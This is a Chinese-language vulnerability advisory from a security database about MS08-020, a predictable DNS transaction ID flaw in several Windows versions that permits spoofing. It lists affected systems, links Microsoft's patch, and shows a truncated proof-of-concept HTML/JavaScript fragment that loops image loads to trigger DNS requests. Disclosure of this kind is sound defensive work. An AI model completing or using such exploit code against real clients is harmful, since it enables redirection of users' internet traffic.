Microsoft Windows DNS客户端可预测事件处理ID漏洞（MS08-020）

2008-04-1000:00:00

Root

www.seebug.org

0.674 Medium

EPSS

Percentile

97.6%

JSON

BUGTRAQ ID: 28553
CVE(CAN) ID: CVE-2008-1085

Microsoft Windows是微软发布的非常流行的操作系统。

Windows DNS客户端服务在执行DNS查询时，随机选择事件处理值没有提供足够的熵。未经认证的攻击者可以向有漏洞客户端的DNS请求返回恶意响应，欺骗或重新定向合法位置的Internet通讯。

Microsoft Windows XP SP2
Microsoft Windows Vista
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows 2000SP4
Microsoft

Microsoft已经为此发布了一个安全公告（MS08-020）以及相应补丁:
MS08-020：Vulnerability in DNS Client Could Allow Spoofing (945553)
链接：<a href=“http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx?pf=true” target=“_blank”>http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx?pf=true</a>


                                                &lt;html&gt;
&lt;body&gt;
&lt;script&gt;
var&nbsp;max_n=20;
var&nbsp;n=0;
var&nbsp;x=new&nbsp;Image();
x.onerror=loadnext;
x.onload=loadnext;
function&nbsp;loadnext()
{
if&nbsp;(n&

0.674 Medium

EPSS

Percentile

97.6%

JSON

Related for SSV:3141

Microsoft Windows DNS客户端可预测事件处理ID漏洞（MS08-020）

Microsoft Windows XP SP2 Microsoft Windows Vista Microsoft Windows Server 2003 SP2 Microsoft Windows Server 2003 SP1 Microsoft Windows 2000SP4 Microsoft

Related

Microsoft Windows XP SP2
Microsoft Windows Vista
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows 2000SP4
Microsoft